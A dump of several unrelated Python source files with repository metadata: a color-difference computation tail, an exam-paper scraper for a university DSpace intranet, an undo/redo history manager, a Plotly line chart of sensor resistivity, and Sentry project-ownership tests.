delta_hp = diff_h2p_h1p + (numpy.fabs(diff_h2p_h1p) > 180) * 360
delta_hp -= (h2p > h1p) * 720
delta_Lp = lab_color_matrix[:, 0] - L
delta_Cp = C2p - C1p
delta_Hp = 2 * numpy.sqrt(C2p * C1p) * numpy.sin(numpy.radians(delta_hp) / 2.0)
S_L = 1 + ((0.015 * numpy.power(avg_Lp - 50, 2)) / numpy.sqrt(20 + numpy.power(avg_Lp - 50, 2.0)))
S_C = 1 + 0.045 * avg_C1p_C2p
S_H = 1 + 0.015 * avg_C1p_C2p * T
delta_ro = 30 * numpy.exp(-(numpy.power(((avg_Hp - 275) / 25), 2.0)))
R_C = numpy.sqrt((numpy.power(avg_C1p_C2p, 7.0)) / (numpy.power(avg_C1p_C2p, 7.0) + numpy.power(25.0, 7.0)))
R_T = -2 * R_C * numpy.sin(2 * numpy.radians(delta_ro))
return numpy.sqrt(
numpy.power(delta_Lp / (S_L * Kl), 2) +
numpy.power(delta_Cp / (S_C * Kc), 2) +
numpy.power(delta_Hp / (S_H * Kh), 2) +
R_T * (delta_Cp / (S_C * Kc)) * (delta_Hp / (S_H * Kh)))
| true
| true
|
f704fab0af522b8019096eec4487783464bda665
| 3,827
|
py
|
Python
|
IntranetExam.py
|
capturemathan/Amrita_Intranet_ExamPapers
|
8d11b5c9ce8d1641e05d219acfa91b2f5b2b6584
|
[
"MIT"
] | null | null | null |
IntranetExam.py
|
capturemathan/Amrita_Intranet_ExamPapers
|
8d11b5c9ce8d1641e05d219acfa91b2f5b2b6584
|
[
"MIT"
] | null | null | null |
IntranetExam.py
|
capturemathan/Amrita_Intranet_ExamPapers
|
8d11b5c9ce8d1641e05d219acfa91b2f5b2b6584
|
[
"MIT"
] | null | null | null |
import os
import webbrowser
import time
import random
import requests
from bs4 import BeautifulSoup
from prettytable import PrettyTable
from time import sleep
# Interactive CLI for browsing and downloading question papers from the
# Amrita intranet DSpace repository. Scrapes the XMLUI listing pages with
# BeautifulSoup and walks: semester -> title -> item -> file.
cont = 1
print("Welcome to Qp Bank !")
sleep(1)
print("Crafted with love by Mathan.S")
sleep(1)
print("Ensure your connectivity to Amrita Wifi for smooth experience :)")
# Captcha Disabled
"""a=["M234x","Ad34T","Fr45C","J234r","PKa67"]
z=random.randint(0,4)
print(a[z])
captcha=input("Enter the captcha")
while(captcha!=a[z]):
    print("Enter the correct captcha..")
    a=["M234x","Ad34T","Fr45C","J234r","PKa67"]
    z=random.randint(0,4)
    print(a[z])
    captcha=input("Enter the captcha")"""
# Main loop: one iteration per question-paper lookup.
while(cont==1):
    # Level 1: community page listing all semesters.
    url="http://dspace.amritanet.edu:8080/xmlui/handle/123456789/150"
    page=requests.get(url)
    soup=BeautifulSoup(page.content,'html.parser')
    div=soup.div
    main_div=soup.find(id="aspect_artifactbrowser_CommunityViewer_div_community-view")
    t=PrettyTable(["S.No","Attribute"])
    main_list_item=main_div.ul
    items=main_list_item.findAll("li")
    for i in range(len(items)):
        t.add_row([i+1,items[i].a.text.strip()])
    print(t)
    # NOTE(review): int(input(...)) raises ValueError on non-numeric input;
    # the loops below only re-prompt for out-of-range numbers.
    ch=int(input("Enter your Semester "))
    while((ch>len(items)) or (ch<0)):
        ch=int(input("Enter your Semester "))
    url="http://dspace.amritanet.edu:8080"
    url+=items[ch-1].a["href"]
    print("Give me just a minute...")
    # Level 2: semester page; the relevant <ul> index differs by semester
    # (presumably due to a different page layout — verify against the site).
    sec_page=requests.get(url)
    sec_soup=BeautifulSoup(sec_page.content,'html.parser')
    u=sec_soup.findAll("ul")
    if ch<=6:
        sec_li=u[3].findAll("li")
    else:
        sec_li=u[2].findAll("li")
    p=PrettyTable(["S.No","Title"])
    for j in range(len(sec_li)):
        p.add_row([j+1,sec_li[j].a.text.strip()])
    print(p)
    ch3=int(input("Enter your choice "))
    while((ch3>len(sec_li)) or (ch3<0)):
        ch3=int(input("Enter your choice "))
    url="http://dspace.amritanet.edu:8080/"
    url+=sec_li[ch3-1].a["href"]
    # Level 3: collection page with recent submissions.
    third_page=requests.get(url)
    third_soup=BeautifulSoup(third_page.content,'html.parser')
    u3_div=third_soup.findAll("div",class_="ds-static-div secondary recent-submission")
    third_div=u3_div[0].a.text.strip()
    third_li=u3_div[0].findAll("li")
    m=PrettyTable(["S.No","Title"])
    m.add_row([1,third_div])
    print(m)
    ch4=int(input("Enter your choice "))
    while((ch4>len(third_li)) or (ch4<0)):
        ch4=int(input("Enter your choice "))
    url="http://dspace.amritanet.edu:8080/"
    url+=third_li[ch4-1].a["href"]
    # Level 4: item page; subject names come from the second <span> of each
    # file-metadata div, comma-separated (first token is the display name).
    fourth_page=requests.get(url)
    fourth_soup=BeautifulSoup(fourth_page.content,'html.parser')
    u4_div=fourth_soup.findAll("div",class_="file-metadata")
    v=PrettyTable(["S.No","Subjects"])
    u4_temp=[]
    mod_u4_temp=[]
    for i in range(len(u4_div)):
        u4_temp.append((u4_div[i].findAll("span")[1].text))
    for j in range(len(u4_temp)):
        mod_u4_temp=u4_temp[j].split(",")
        v.add_row([j+1,mod_u4_temp[0]])
    print(v)
    last_ch=int(input("Enter your choice "))
    last_div=fourth_soup.findAll("div",class_="file-link")
    while((last_ch>len(last_div)) or (last_ch<0)):
        last_ch=int(input("Enter your choice "))
    url_last="http://dspace.amritanet.edu:8080"
    url_last+=last_div[last_ch-1].a["href"]
    print("All the very best for your exams :)")
    sleep(1)
    # Either download the file to the current directory or open it in the
    # default browser.
    download=int(input("Enter 1 to download or 0 to open in browser "))
    while(download!=1 and download!=0):
        download=int(input("Enter 1 to download or 0 to open in browser "))
    print("Give me just a minute :)")
    if(download==1):
        response = requests.get(url_last)
        # Derive the local filename from the last URL segment, dropping any
        # query string.
        spliturl=url_last.split("/")
        namewithext=spliturl[-1]
        name_reduced=namewithext.split("?")
        save=name_reduced[0]
        #save+=".pdf"
        with open(save,'wb') as f:
            f.write(response.content)
        print("The Qp is waiting for you at "+os.getcwd())
    else:
        print("The Qp is waiting for you :)")
        webbrowser.open_new(url_last)
    cont=int(input("Enter 1 to view another Qp or 0 to exit "))
| 29.898438
| 85
| 0.679906
|
import os
import webbrowser
import time
import random
import requests
from bs4 import BeautifulSoup
from prettytable import PrettyTable
from time import sleep
cont = 1
print("Welcome to Qp Bank !")
sleep(1)
print("Crafted with love by Mathan.S")
sleep(1)
print("Ensure your connectivity to Amrita Wifi for smooth experience :)")
while(cont==1):
url="http://dspace.amritanet.edu:8080/xmlui/handle/123456789/150"
page=requests.get(url)
soup=BeautifulSoup(page.content,'html.parser')
div=soup.div
main_div=soup.find(id="aspect_artifactbrowser_CommunityViewer_div_community-view")
t=PrettyTable(["S.No","Attribute"])
main_list_item=main_div.ul
items=main_list_item.findAll("li")
for i in range(len(items)):
t.add_row([i+1,items[i].a.text.strip()])
print(t)
ch=int(input("Enter your Semester "))
while((ch>len(items)) or (ch<0)):
ch=int(input("Enter your Semester "))
url="http://dspace.amritanet.edu:8080"
url+=items[ch-1].a["href"]
print("Give me just a minute...")
sec_page=requests.get(url)
sec_soup=BeautifulSoup(sec_page.content,'html.parser')
u=sec_soup.findAll("ul")
if ch<=6:
sec_li=u[3].findAll("li")
else:
sec_li=u[2].findAll("li")
p=PrettyTable(["S.No","Title"])
for j in range(len(sec_li)):
p.add_row([j+1,sec_li[j].a.text.strip()])
print(p)
ch3=int(input("Enter your choice "))
while((ch3>len(sec_li)) or (ch3<0)):
ch3=int(input("Enter your choice "))
url="http://dspace.amritanet.edu:8080/"
url+=sec_li[ch3-1].a["href"]
third_page=requests.get(url)
third_soup=BeautifulSoup(third_page.content,'html.parser')
u3_div=third_soup.findAll("div",class_="ds-static-div secondary recent-submission")
third_div=u3_div[0].a.text.strip()
third_li=u3_div[0].findAll("li")
m=PrettyTable(["S.No","Title"])
m.add_row([1,third_div])
print(m)
ch4=int(input("Enter your choice "))
while((ch4>len(third_li)) or (ch4<0)):
ch4=int(input("Enter your choice "))
url="http://dspace.amritanet.edu:8080/"
url+=third_li[ch4-1].a["href"]
fourth_page=requests.get(url)
fourth_soup=BeautifulSoup(fourth_page.content,'html.parser')
u4_div=fourth_soup.findAll("div",class_="file-metadata")
v=PrettyTable(["S.No","Subjects"])
u4_temp=[]
mod_u4_temp=[]
for i in range(len(u4_div)):
u4_temp.append((u4_div[i].findAll("span")[1].text))
for j in range(len(u4_temp)):
mod_u4_temp=u4_temp[j].split(",")
v.add_row([j+1,mod_u4_temp[0]])
print(v)
last_ch=int(input("Enter your choice "))
last_div=fourth_soup.findAll("div",class_="file-link")
while((last_ch>len(last_div)) or (last_ch<0)):
last_ch=int(input("Enter your choice "))
url_last="http://dspace.amritanet.edu:8080"
url_last+=last_div[last_ch-1].a["href"]
print("All the very best for your exams :)")
sleep(1)
download=int(input("Enter 1 to download or 0 to open in browser "))
while(download!=1 and download!=0):
download=int(input("Enter 1 to download or 0 to open in browser "))
print("Give me just a minute :)")
if(download==1):
response = requests.get(url_last)
spliturl=url_last.split("/")
namewithext=spliturl[-1]
name_reduced=namewithext.split("?")
save=name_reduced[0]
with open(save,'wb') as f:
f.write(response.content)
print("The Qp is waiting for you at "+os.getcwd())
else:
print("The Qp is waiting for you :)")
webbrowser.open_new(url_last)
cont=int(input("Enter 1 to view another Qp or 0 to exit "))
| true
| true
|
f704fb25ca1ed4fdc84a58c5353bd993763a5b53
| 820
|
py
|
Python
|
amulet/api/history.py
|
Podshot/Amulet-Core
|
678a722daa5e4487d193a7e947ccceacac325fd2
|
[
"MIT"
] | null | null | null |
amulet/api/history.py
|
Podshot/Amulet-Core
|
678a722daa5e4487d193a7e947ccceacac325fd2
|
[
"MIT"
] | null | null | null |
amulet/api/history.py
|
Podshot/Amulet-Core
|
678a722daa5e4487d193a7e947ccceacac325fd2
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from .data_structures import Stack
from .operation import Operation
class HistoryManager:
    """Tracks applied Operations on two stacks to support undo/redo."""

    def __init__(self):
        # Operations that have been applied (undo candidates) and operations
        # that have been undone (redo candidates).
        self.undo_stack: Stack[Operation] = Stack()
        self.redo_stack: Stack[Operation] = Stack()

    def add_operation(self, operation_instance: Operation):
        """Record a newly applied operation so it can later be undone."""
        self.undo_stack.append(operation_instance)

    def undo(self) -> Operation:
        """Move the most recent operation onto the redo stack and return it."""
        operation_to_undo = self.undo_stack.pop()
        self.redo_stack.append(operation_to_undo)
        return operation_to_undo

    def redo(self) -> Operation:
        """Move the most recently undone operation back and return it."""
        operation_to_redo = self.redo_stack.pop()
        self.undo_stack.append(operation_to_redo)
        return operation_to_redo

    def __contains__(self, item) -> bool:
        """Membership is defined only for Operations on the undo stack."""
        if isinstance(item, Operation):
            return item in self.undo_stack
        # Previously fell through and returned None implicitly; `in` coerces
        # either way, but __contains__ should return an explicit bool.
        return False
| 29.285714
| 59
| 0.702439
|
from __future__ import annotations
from .data_structures import Stack
from .operation import Operation
class HistoryManager:
def __init__(self):
self.undo_stack: Stack[Operation] = Stack()
self.redo_stack: Stack[Operation] = Stack()
def add_operation(self, operation_instance: Operation):
self.undo_stack.append(operation_instance)
def undo(self) -> Operation:
operation_to_undo = self.undo_stack.pop()
self.redo_stack.append(operation_to_undo)
return operation_to_undo
def redo(self) -> Operation:
operation_to_redo = self.redo_stack.pop()
self.undo_stack.append(operation_to_redo)
return operation_to_redo
def __contains__(self, item):
if isinstance(item, Operation):
return item in self.undo_stack
| true
| true
|
f704fbc9f2528b864b8b22eb0ac9981a1560e438
| 5,522
|
py
|
Python
|
mainapp/webapp/figures/linechart.py
|
thomashusebo/inf219-visualize-2d-sensor-data
|
87572c46579887fb212fdfb6f413e271edc77bfe
|
[
"MIT"
] | null | null | null |
mainapp/webapp/figures/linechart.py
|
thomashusebo/inf219-visualize-2d-sensor-data
|
87572c46579887fb212fdfb6f413e271edc77bfe
|
[
"MIT"
] | 43
|
2020-02-14T16:15:15.000Z
|
2020-07-14T12:05:09.000Z
|
mainapp/webapp/figures/linechart.py
|
thomashusebo/inf219-visualize-2d-sensor-data
|
87572c46579887fb212fdfb6f413e271edc77bfe
|
[
"MIT"
] | null | null | null |
import plotly.graph_objects as go
from mainapp.app_settings import cell_length_meter
def getLineChart(
        data,
        timestamp,
        coordinates,
        colorScale,
        timeline,
        color_range,
        dragmode=False,
        quick_select_range=True,
        calibration_time=None,
        show_legend=False):
    """Build a Plotly line chart of sensor values over time.

    `data` is a DataFrame-like object whose first column is the time axis
    and whose remaining columns are per-cell value series (one per entry in
    `coordinates`). A vertical marker is drawn at `timestamp` (and at
    `calibration_time` if given), and the `colorScale` is rendered as
    horizontal background bands spanning `color_range`. Returns a
    `go.Figure`, or a bare dict with a 'No data found' layout when `data`
    is empty.
    """
    if len(data) < 1: return {
        'data': [],
        'layout': go.Layout(title=go.layout.Title(text='No data found'))
    }
    # First column is the shared x (time) axis for every trace.
    x = data.iloc[:, 0].values
    linechart_fig = go.Figure()
    # Row-wise mean/std across all value columns; currently only used by the
    # disabled error-band code below.
    means = data.iloc[:, 1:].transpose().mean().transpose()
    var = data.iloc[:, 1:].transpose().std().transpose()
    # Add continuous error bars to the plot
    '''error_colors = ['#d9d9d9', '#bdbdbd', '#969696']
    for i in reversed(range(1, 4)):
        fill_color = error_colors[i-1]
        if data.shape[1] > 2:
            linechart_fig.add_trace(go.Scatter(
                x=x,
                y=means - i * var,
                mode='lines',
                line=dict(width=1, color='black'),
                showlegend=False
            ))
            linechart_fig.add_trace(go.Scatter(
                name='{} sigma'.format(i),
                x=x,
                y=means + i * var,
                mode='lines',
                marker=dict(color="#444"),
                line=dict(width=1, color='black'),
                fillcolor=fill_color,
                fill='tonexty'))'''
    # Add individual traces to the plot
    # One trace per value column, labelled by its [x, y] cell coordinate.
    ys = data.shape[1]
    for y in range(1, ys):
        coord = coordinates[y-1]
        # NOTE(review): loop index `y` is rebound to the column values here.
        y = data.iloc[:, y].values
        linechart_fig.add_trace(go.Scatter(
            name='[{:2d},{:2d}]'.format(coord['x'], coord['y']),
            x=x,
            y=y,
            mode='lines+markers',
            line=dict(
                width=1,
                color='#292929'),
            marker=dict(
                size=2,
                color='#292929'),
            showlegend=show_legend
        ))
    # Add central values to the plot
    '''if data.shape[1] > 1:
        if data.shape[1] == 2:
            trace_name = '[{:d},{:d}]'.format(coordinates[0]['x'], coordinates[0]['y'])
        else:
            trace_name = 'Average'
        linechart_fig.add_trace(go.Scatter(
            name=trace_name,
            x=x,
            y=means,
            mode='lines+markers',
            line=dict(
                color='#292929',
                width=1,
            ),
            marker=dict(
                color='#292929',
                size=3,
            ),
            showlegend=True,
        ))'''
    # Add vertical line representing selected timestamp
    linechart_fig.add_shape(
        # Line Vertical
        dict(
            name='selected timestamp',
            type="line",
            yref='paper',
            x0=timestamp,
            y0=0,
            x1=timestamp,
            y1=1,
            line=dict(
                color="black",
                width=5
            ),
        ))
    # Add vertical line representing selected calibration
    if calibration_time is not None:
        linechart_fig.add_shape(
            # Line Vertical
            dict(
                name='calibration time',
                type="line",
                yref='paper',
                x0=calibration_time,
                y0=0,
                x1=calibration_time,
                y1=1,
                line=dict(
                    color="green",
                    width=5
                ),
            ))
    #Add colorbar to plot
    # Draw the color scale as stacked horizontal bands behind the traces.
    if color_range['min'] is not None and color_range['max'] is not None:
        # NOTE(review): `min` and `max` shadow the builtins within this
        # branch (`max` is never read) — consider renaming.
        min = color_range['min']
        max = color_range['max']
        width_of_line = (color_range['max'] - color_range['min']) / len(colorScale)
        for i in range(len(colorScale)):
            linechart_fig.add_shape(
                dict(
                    type="rect",
                    xref="paper",
                    yref="y",
                    x0=0,
                    y0= min + i*width_of_line, #if i > 0 else 0 if min <= max else 12000,
                    x1=1,
                    y1=min + (i+1)*width_of_line, #if i < len(colorScale)-1 else 12000 if min <= max else 0,
                    fillcolor=colorScale[i][1],
                    opacity=0.6,
                    layer="below",
                    line_width=0,
                )
            )
    # Optional quick-select buttons for common time windows.
    range_selector = None
    if quick_select_range:
        range_selector = dict(
            buttons=list([
                dict(count=1, label="1m", step="minute", stepmode="backward"),
                dict(count=1, label="1h", step="hour", stepmode="backward"),
                dict(count=1, label="1d", step="day", stepmode="backward"),
                dict(count=7, label="1w", step="day", stepmode="backward")
            ])
        )
    linechart_fig.update_layout(
        xaxis=dict(
            range=[timeline['start'], timeline['end']],
            type="date",
            linecolor='black',
            gridcolor='LightGrey',
            rangeselector=range_selector
        ),
        yaxis=dict(
            title='Resistivity (Ohm)',
            rangemode='tozero',
            linecolor='black',
            gridcolor='LightGrey',
            fixedrange=True
        ),
        margin=dict(
            l=15,
            r=0,
            t=30,
            b=5,
            pad=0
        ),
        plot_bgcolor='white',
        dragmode=dragmode,
        height=250,
    )
    return linechart_fig
| 29.216931
| 108
| 0.458892
|
import plotly.graph_objects as go
from mainapp.app_settings import cell_length_meter
def getLineChart(
data,
timestamp,
coordinates,
colorScale,
timeline,
color_range,
dragmode=False,
quick_select_range=True,
calibration_time=None,
show_legend=False):
if len(data) < 1: return {
'data': [],
'layout': go.Layout(title=go.layout.Title(text='No data found'))
}
x = data.iloc[:, 0].values
linechart_fig = go.Figure()
means = data.iloc[:, 1:].transpose().mean().transpose()
var = data.iloc[:, 1:].transpose().std().transpose()
ys = data.shape[1]
for y in range(1, ys):
coord = coordinates[y-1]
y = data.iloc[:, y].values
linechart_fig.add_trace(go.Scatter(
name='[{:2d},{:2d}]'.format(coord['x'], coord['y']),
x=x,
y=y,
mode='lines+markers',
line=dict(
width=1,
color='#292929'),
marker=dict(
size=2,
color='#292929'),
showlegend=show_legend
))
linechart_fig.add_shape(
dict(
name='selected timestamp',
type="line",
yref='paper',
x0=timestamp,
y0=0,
x1=timestamp,
y1=1,
line=dict(
color="black",
width=5
),
))
if calibration_time is not None:
linechart_fig.add_shape(
dict(
name='calibration time',
type="line",
yref='paper',
x0=calibration_time,
y0=0,
x1=calibration_time,
y1=1,
line=dict(
color="green",
width=5
),
))
if color_range['min'] is not None and color_range['max'] is not None:
min = color_range['min']
max = color_range['max']
width_of_line = (color_range['max'] - color_range['min']) / len(colorScale)
for i in range(len(colorScale)):
linechart_fig.add_shape(
dict(
type="rect",
xref="paper",
yref="y",
x0=0,
y0= min + i*width_of_line,
x1=1,
y1=min + (i+1)*width_of_line,
fillcolor=colorScale[i][1],
opacity=0.6,
layer="below",
line_width=0,
)
)
range_selector = None
if quick_select_range:
range_selector = dict(
buttons=list([
dict(count=1, label="1m", step="minute", stepmode="backward"),
dict(count=1, label="1h", step="hour", stepmode="backward"),
dict(count=1, label="1d", step="day", stepmode="backward"),
dict(count=7, label="1w", step="day", stepmode="backward")
])
)
linechart_fig.update_layout(
xaxis=dict(
range=[timeline['start'], timeline['end']],
type="date",
linecolor='black',
gridcolor='LightGrey',
rangeselector=range_selector
),
yaxis=dict(
title='Resistivity (Ohm)',
rangemode='tozero',
linecolor='black',
gridcolor='LightGrey',
fixedrange=True
),
margin=dict(
l=15,
r=0,
t=30,
b=5,
pad=0
),
plot_bgcolor='white',
dragmode=dragmode,
height=250,
)
return linechart_fig
| true
| true
|
f704fc4963a514b11f2efd68c503b1d00784b219
| 5,508
|
py
|
Python
|
tests/sentry/models/test_projectownership.py
|
AlexWayfer/sentry
|
ef935cda2b2e960bd602fda590540882d1b0712d
|
[
"BSD-3-Clause"
] | 1
|
2022-02-09T22:56:49.000Z
|
2022-02-09T22:56:49.000Z
|
tests/sentry/models/test_projectownership.py
|
AlexWayfer/sentry
|
ef935cda2b2e960bd602fda590540882d1b0712d
|
[
"BSD-3-Clause"
] | 6
|
2018-10-19T10:04:23.000Z
|
2019-12-09T20:29:12.000Z
|
tests/sentry/models/test_projectownership.py
|
AlexWayfer/sentry
|
ef935cda2b2e960bd602fda590540882d1b0712d
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import
from sentry.testutils import TestCase
from sentry.api.fields.actor import Actor
from sentry.models import ProjectOwnership, User, Team
from sentry.models.projectownership import resolve_actors
from sentry.ownership.grammar import Rule, Owner, Matcher, dump_schema
class ProjectOwnershipTestCase(TestCase):
    """Tests for ProjectOwnership.get_owners path-rule matching."""

    def assert_ownership_equals(self, o1, o2):
        # Compare (actors, rules) pairs order-insensitively.
        assert (
            sorted(o1[0]) == sorted(o2[0]) and
            sorted(o1[1]) == sorted(o2[1])
        )

    def test_get_owners_default(self):
        # With no ownership configured, everyone owns and no rule matched.
        assert ProjectOwnership.get_owners(self.project.id, {}) == (ProjectOwnership.Everyone, None)

    def test_get_owners_basic(self):
        # rule_a assigns *.py files to the team; rule_b assigns src/* to the user.
        rule_a = Rule(
            Matcher('path', '*.py'), [
                Owner('team', self.team.slug),
            ])
        rule_b = Rule(
            Matcher('path', 'src/*'), [
                Owner('user', self.user.email),
            ])
        ProjectOwnership.objects.create(
            project_id=self.project.id,
            schema=dump_schema([rule_a, rule_b]),
            fallthrough=True,
        )
        # No data matches
        assert ProjectOwnership.get_owners(self.project.id, {}) == (ProjectOwnership.Everyone, None)
        # Match only rule_a
        self.assert_ownership_equals(ProjectOwnership.get_owners(
            self.project.id, {
                'sentry.interfaces.Stacktrace': {
                    'frames': [{
                        'filename': 'foo.py',
                    }]
                }
            }
        ), ([Actor(self.team.id, Team)], [rule_a]))
        # Match only rule_b
        self.assert_ownership_equals(ProjectOwnership.get_owners(
            self.project.id, {
                'sentry.interfaces.Stacktrace': {
                    'frames': [{
                        'filename': 'src/thing.txt',
                    }]
                }
            }
        ), ([Actor(self.user.id, User)], [rule_b]))
        # Matches both rule_a and rule_b
        self.assert_ownership_equals(ProjectOwnership.get_owners(
            self.project.id, {
                'sentry.interfaces.Stacktrace': {
                    'frames': [{
                        'filename': 'src/foo.py',
                    }]
                }
            }
        ), ([Actor(self.user.id, User), Actor(self.team.id, Team)], [rule_a, rule_b]))
        # No rule matches, but fallthrough=True assigns Everyone.
        assert ProjectOwnership.get_owners(
            self.project.id, {
                'sentry.interfaces.Stacktrace': {
                    'frames': [{
                        'filename': 'xxxx',
                    }]
                }
            }
        ) == (ProjectOwnership.Everyone, None)
        # When fallthrough = False, we don't implicitly assign to Everyone
        ProjectOwnership.objects.filter(
            project_id=self.project.id,
        ).update(fallthrough=False)
        assert ProjectOwnership.get_owners(
            self.project.id, {
                'sentry.interfaces.Stacktrace': {
                    'frames': [{
                        'filename': 'xxxx',
                    }]
                }
            }
        ) == ([], None)
class ResolveActorsTestCase(TestCase):
    """Exercises resolve_actors: mapping Owner declarations to Actor instances."""
    def test_no_actors(self):
        # An empty owner list resolves to an empty mapping.
        assert resolve_actors([], self.project.id) == {}
    def test_basic(self):
        """One user owner and one team owner each resolve to their Actor."""
        owners = [
            Owner('user', self.user.email),
            Owner('team', self.team.slug),
        ]
        assert resolve_actors(owners, self.project.id) == {
            owners[0]: Actor(self.user.id, User),
            owners[1]: Actor(self.team.id, Team),
        }
    def test_teams(self):
        """Unknown teams and teams outside the project resolve to None."""
        # Normal team
        owner1 = Owner('team', self.team.slug)
        actor1 = Actor(self.team.id, Team)
        # Team that doesn't exist
        owner2 = Owner('team', 'nope')
        actor2 = None
        # A team that's not ours
        otherteam = Team.objects.exclude(projectteam__project_id=self.project.id)[0]
        owner3 = Owner('team', otherteam.slug)
        actor3 = None
        assert resolve_actors([owner1, owner2, owner3], self.project.id) == {
            owner1: actor1,
            owner2: actor2,
            owner3: actor3,
        }
    def test_users(self):
        """Secondary emails map to the primary user; outsiders resolve to None."""
        # Normal user
        owner1 = Owner('user', self.user.email)
        actor1 = Actor(self.user.id, User)
        # An extra secondary email
        email1 = self.create_useremail(self.user, None, is_verified=True).email
        owner2 = Owner('user', email1)
        actor2 = actor1  # They map to the same user since it's just a secondary email
        # Another secondary email, that isn't verified
        email2 = self.create_useremail(self.user, None, is_verified=False).email
        owner3 = Owner('user', email2)
        # Intentionally allow unverified emails
        # actor3 = None
        actor3 = actor1
        # An entirely unknown user
        owner4 = Owner('user', 'nope')
        actor4 = None
        # A user that doesn't belong with us
        otheruser = self.create_user()
        owner5 = Owner('user', otheruser.email)
        actor5 = None
        # Case-insensitive for user
        owner6 = Owner('user', self.user.email.upper())
        actor6 = actor1
        assert resolve_actors([owner1, owner2, owner3, owner4, owner5, owner6], self.project.id) == {
            owner1: actor1,
            owner2: actor2,
            owner3: actor3,
            owner4: actor4,
            owner5: actor5,
            owner6: actor6,
        }
| 32.210526
| 101
| 0.535766
|
from __future__ import absolute_import
from sentry.testutils import TestCase
from sentry.api.fields.actor import Actor
from sentry.models import ProjectOwnership, User, Team
from sentry.models.projectownership import resolve_actors
from sentry.ownership.grammar import Rule, Owner, Matcher, dump_schema
class ProjectOwnershipTestCase(TestCase):
    """Exercises ProjectOwnership.get_owners path-rule matching and fallthrough."""
    def assert_ownership_equals(self, o1, o2):
        """Compare two (actors, rules) ownership tuples order-insensitively."""
        assert (
            sorted(o1[0]) == sorted(o2[0]) and
            sorted(o1[1]) == sorted(o2[1])
        )
    def test_get_owners_default(self):
        # With no ownership schema configured, ownership falls back to Everyone.
        assert ProjectOwnership.get_owners(self.project.id, {}) == (ProjectOwnership.Everyone, None)
    def test_get_owners_basic(self):
        # rule_a: the team owns *.py files; rule_b: the user owns anything under src/.
        rule_a = Rule(
            Matcher('path', '*.py'), [
                Owner('team', self.team.slug),
            ])
        rule_b = Rule(
            Matcher('path', 'src/*'), [
                Owner('user', self.user.email),
            ])
        ProjectOwnership.objects.create(
            project_id=self.project.id,
            schema=dump_schema([rule_a, rule_b]),
            fallthrough=True,
        )
        # No data matches: ownership falls back to Everyone.
        assert ProjectOwnership.get_owners(self.project.id, {}) == (ProjectOwnership.Everyone, None)
        # Matches only rule_a (*.py).
        self.assert_ownership_equals(ProjectOwnership.get_owners(
            self.project.id, {
                'sentry.interfaces.Stacktrace': {
                    'frames': [{
                        'filename': 'foo.py',
                    }]
                }
            }
        ), ([Actor(self.team.id, Team)], [rule_a]))
        # Matches only rule_b (src/*).
        self.assert_ownership_equals(ProjectOwnership.get_owners(
            self.project.id, {
                'sentry.interfaces.Stacktrace': {
                    'frames': [{
                        'filename': 'src/thing.txt',
                    }]
                }
            }
        ), ([Actor(self.user.id, User)], [rule_b]))
        # Matches both rule_a and rule_b.
        self.assert_ownership_equals(ProjectOwnership.get_owners(
            self.project.id, {
                'sentry.interfaces.Stacktrace': {
                    'frames': [{
                        'filename': 'src/foo.py',
                    }]
                }
            }
        ), ([Actor(self.user.id, User), Actor(self.team.id, Team)], [rule_a, rule_b]))
        # Unmatched path still resolves to Everyone while fallthrough=True.
        assert ProjectOwnership.get_owners(
            self.project.id, {
                'sentry.interfaces.Stacktrace': {
                    'frames': [{
                        'filename': 'xxxx',
                    }]
                }
            }
        ) == (ProjectOwnership.Everyone, None)
        # With fallthrough=False there is no implicit assignment to Everyone.
        ProjectOwnership.objects.filter(
            project_id=self.project.id,
        ).update(fallthrough=False)
        assert ProjectOwnership.get_owners(
            self.project.id, {
                'sentry.interfaces.Stacktrace': {
                    'frames': [{
                        'filename': 'xxxx',
                    }]
                }
            }
        ) == ([], None)
class ResolveActorsTestCase(TestCase):
    """Exercises resolve_actors: mapping Owner declarations to Actor instances."""
    def test_no_actors(self):
        # An empty owner list resolves to an empty mapping.
        assert resolve_actors([], self.project.id) == {}
    def test_basic(self):
        """One user owner and one team owner each resolve to their Actor."""
        owners = [
            Owner('user', self.user.email),
            Owner('team', self.team.slug),
        ]
        assert resolve_actors(owners, self.project.id) == {
            owners[0]: Actor(self.user.id, User),
            owners[1]: Actor(self.team.id, Team),
        }
    def test_teams(self):
        """Unknown teams and teams outside the project resolve to None."""
        # Normal team
        owner1 = Owner('team', self.team.slug)
        actor1 = Actor(self.team.id, Team)
        # Team that doesn't exist
        owner2 = Owner('team', 'nope')
        actor2 = None
        # A team that belongs to a different project resolves to None.
        otherteam = Team.objects.exclude(projectteam__project_id=self.project.id)[0]
        owner3 = Owner('team', otherteam.slug)
        actor3 = None
        assert resolve_actors([owner1, owner2, owner3], self.project.id) == {
            owner1: actor1,
            owner2: actor2,
            owner3: actor3,
        }
    def test_users(self):
        """Secondary emails map to the primary user; outsiders resolve to None."""
        # Normal user
        owner1 = Owner('user', self.user.email)
        actor1 = Actor(self.user.id, User)
        # An extra secondary email
        email1 = self.create_useremail(self.user, None, is_verified=True).email
        owner2 = Owner('user', email1)
        actor2 = actor1  # They map to the same user since it's just a secondary email
        # A secondary email that is not verified.
        email2 = self.create_useremail(self.user, None, is_verified=False).email
        owner3 = Owner('user', email2)
        # Intentionally allow unverified emails
        # actor3 = None
        actor3 = actor1
        # An entirely unknown user
        owner4 = Owner('user', 'nope')
        actor4 = None
        # A user that doesn't belong with us
        otheruser = self.create_user()
        owner5 = Owner('user', otheruser.email)
        actor5 = None
        # Email matching is case-insensitive.
        owner6 = Owner('user', self.user.email.upper())
        actor6 = actor1
        assert resolve_actors([owner1, owner2, owner3, owner4, owner5, owner6], self.project.id) == {
            owner1: actor1,
            owner2: actor2,
            owner3: actor3,
            owner4: actor4,
            owner5: actor5,
            owner6: actor6,
        }
| true
| true
|
f704fc910bd0b1ded2564c2c436dd36c7bac1bc0
| 609
|
py
|
Python
|
Redmi_note9/PUCO_Bob/day_start/show_test_0.py
|
Lezaza/hotpoor_autoclick_xhs
|
52eafad8cce59353a9de5bf6e488e8a2602e5536
|
[
"Apache-2.0"
] | 1
|
2021-12-21T10:42:46.000Z
|
2021-12-21T10:42:46.000Z
|
Redmi_note9/PUCO_Bob/day_start/show_test_0.py
|
2218084076/hotpoor_autoclick_xhs
|
a52446ba691ac19e43410a465dc63f940c0e444d
|
[
"Apache-2.0"
] | 2
|
2021-11-03T11:36:44.000Z
|
2021-11-05T07:58:13.000Z
|
Redmi_note9/PUCO_Bob/day_start/show_test_0.py
|
